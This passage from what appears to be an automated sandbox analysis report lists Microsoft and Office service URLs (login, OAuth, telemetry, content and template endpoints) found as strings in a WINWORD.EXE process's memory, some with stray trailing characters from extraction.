Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://contacts.msn.com/ABService/ABService.asmx.asmx
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://contentstorage.osi.office.net/getofficecarouselcore/index.htmltml
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cortana.ai
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cortana.ai/api
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cortana.ai/apiJ
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cortana.aib
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cortana.aitlf
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cr.office.comF
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cr.office.comv
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.docs.live.net
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.docs.live.netz
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileHwz
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.comb
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A554000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.prot
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileUwg
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileX
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesIa
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesMn
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesi
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://designerappservice.officeapps.live.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dev.cortana.ai
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dev.cortana.aiF
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/intt
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/tPrintx~O
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://directory.services.
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://directory.services.live.com/profile/Profile.asmx.asmxg
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.live.net/SharingService.svcvice.svcr
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.live.net/SkyDocsService.svcvice.svc
Source: WINWORD.EXE, 00000000.00000002.2999370908.000001D796376000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.live.net/skydocsservice.svc-1001
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A554000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.nel.measure.office.net/api/report?TenantId=Office&DestinationEndpoint=Edge-Prod-EWR30r1&
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com
Source: WINWORD.EXE, 00000000.00000002.2999370908.000001D796502000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com/config/v2/Office/word/16.0.18129.20158/Production/CC?&EcsCanary=1&Clientid=
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/0x
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1Bqq
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1fqU
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.jsonl$v
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml1v
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtmlCw
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtmln
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/pcD
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A3D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://entitlement.diagnostics.office.com17Dh0
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A3D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://entitlement.diagnostics.office.comces/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A3D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://entity.osi.office.net/t
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechWra
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excelsgs.officeapps.live.com/xlfrontdoor/FrontDoor.ashx
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://explore.live.com/homehttps://odc.officeapps.live.com/odc/stat/images/sm/liveconnect_16_1.png
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://forms.office.com/Pages/DesignPage.aspx
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://forms.office.com/Pages/DesignPageV2.aspx?lang=
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://forms.office.com/formapi/api/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.ppe.windows.net
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.ppe.windows.net/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/iPG
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/me?api-version=1.6
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com%
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A429000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com/mediasvc/api/media/getoembedproviders?type=video&endpoints=1&disp
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com/mediasvc/api/media/logowY
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com/mediasvc/api/media/oembed
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.comlients/inapp
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.comppHelpb
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.comrecent01.
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/nts
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/ppG
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3dvideo
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.2999370908.000001D7963D5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideosaaT
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideosyaL
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/sharedfilepickerker
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/videohostpage/videodeo
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/videopickerker
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://identity.osi.office.net/v1/tokenken
Source: WINWORD.EXE, 00000000.00000002.2999370908.000001D796376000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.com
Source: WINWORD.EXE, 00000000.00000002.2999370908.000001D796490000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.comce
Source: WINWORD.EXE, 00000000.00000002.2999370908.000001D796376000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.comom
Source: WINWORD.EXE, 00000000.00000002.2999370908.000001D796376000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.comes/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp2
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppicT
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrtwF
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediagic
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediaupdP
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.osi.office.net/insertmediadia
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech1
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechMt
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechech
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechse
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://localhostMBI_SSLoutlook.live.comoutlook.live.comoutlook.office.comoutlook.office365.comoutlo
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://localhostattachment-sdf.office.netoutlook.live.comoutlook.office.comoutlook-sdf.office.comou
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A500000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/err.srfr.srf
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/logout.srft.srf:g
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&response_type=token&redirect
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfp.srfr0
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_token.srfn.srf
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.comHost
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizex
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeduV
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.2998489516.000001D78D34D000.00000004.00000020.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize(
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize001
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize6ic
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeCore
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeH
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeW
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeX
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeembedP
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeh
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizekrp
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizelient
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizelog
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizelog0
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeog
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeredir
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeredirP
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizesgic
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizesmxH
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizetTelemetry0
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizetemc3?
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizethme
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizetinfo
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizetness
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizex
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/$s
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://management.azure.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://management.azure.com/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://management.azure.com/4Sr
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://management.core.windows.net/
Source: WINWORD.EXE, 00000000.00000002.3009141410.000001D79C4E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/templates/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/templates/detailsformspeech
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A533000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/templates/gallery16
Source: WINWORD.EXE, 00000000.00000002.3013412770.000001D79C518000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/templates/gallery16ers
